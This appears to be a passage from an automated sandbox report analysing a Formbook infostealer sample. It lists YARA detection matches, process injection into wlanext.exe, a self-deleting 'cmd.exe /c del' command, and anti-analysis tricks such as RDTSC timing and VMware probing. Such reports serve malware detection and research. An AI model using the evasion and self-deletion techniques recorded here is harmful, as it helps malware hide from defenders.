          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031525DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314D466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086C804
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086CB98
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00858C2B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00858C6B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00858C70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086C58E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00852D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086CFA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00852FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086CF0C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0308B150 appears 45 times
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: String function: 0041A0B0 appears 52 times
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: String function: 00A6B150 appears 35 times
          Source: eQLPRPErea.exe, 00000001.00000003.699812491.000000001EE2F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs eQLPRPErea.exe
          Source: eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs eQLPRPErea.exe
          Source: eQLPRPErea.exe, 00000003.00000002.736957220.00000000026C2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs eQLPRPErea.exe
          Source: eQLPRPErea.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/12
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01
          Source: C:\Users\user\Desktop\eQLPRPErea.exeFile created: C:\Users\user\AppData\Local\Temp\nsq6028.tmpJump to behavior
          Source: eQLPRPErea.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\eQLPRPErea.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\eQLPRPErea.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: eQLPRPErea.exeVirustotal: Detection: 28%
          Source: eQLPRPErea.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\eQLPRPErea.exeFile read: C:\Users\user\Desktop\eQLPRPErea.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Users\user\Desktop\eQLPRPErea.exeProcess created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\eQLPRPErea.exeProcess created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\eQLPRPErea.exe'
          Source: C:\Users\user\Desktop\eQLPRPErea.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: eQLPRPErea.exe, 00000001.00000003.692305861.000000001ECE0000.00000004.00000001.sdmp, eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: eQLPRPErea.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\eQLPRPErea.exeUnpacked PE file: 3.2.eQLPRPErea.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00416090 push edi; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00407101 push cs; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00416104 push ds; retf
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041CA5A pushfd ; retf
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004162ED push es; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00415EC4 push edx; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00415FA8 push esp; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00ABD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_00416090 push edi; ret
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_00407101 push cs; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_00416104 push ds; retf
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041CA5A pushfd ; retf
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004162ED push es; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00866090 push edi; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00866104 push ds; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00857101 push cs; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_008662ED push es; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086CA5A pushfd ; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086B412 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086B41B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086B47C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00865EC4 push edx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00865FA8 push esp; iretd
          Source: C:\Users\user\Desktop\eQLPRPErea.exeFile created: C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dllJump to dropped file
          Source: C:\Users\user\Desktop\eQLPRPErea.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\eQLPRPErea.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\eQLPRPErea.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\eQLPRPErea.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000008585F4 second address: 00000000008585FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 000000000085898E second address: 0000000000858994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\eQLPRPErea.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5480Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6908Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.709265764.0000000004710000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.716490018.000000000A9A6000.00000004.00000001.sdmpBinary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&g
          Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.715679720.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.712630114.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.715679720.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.961888958.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.715995251.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.716085143.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\eQLPRPErea.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\eQLPRPErea.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_6FC61000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_0291187F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_02911667 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B34015 mov eax, dword ptr fs:[00000030h]
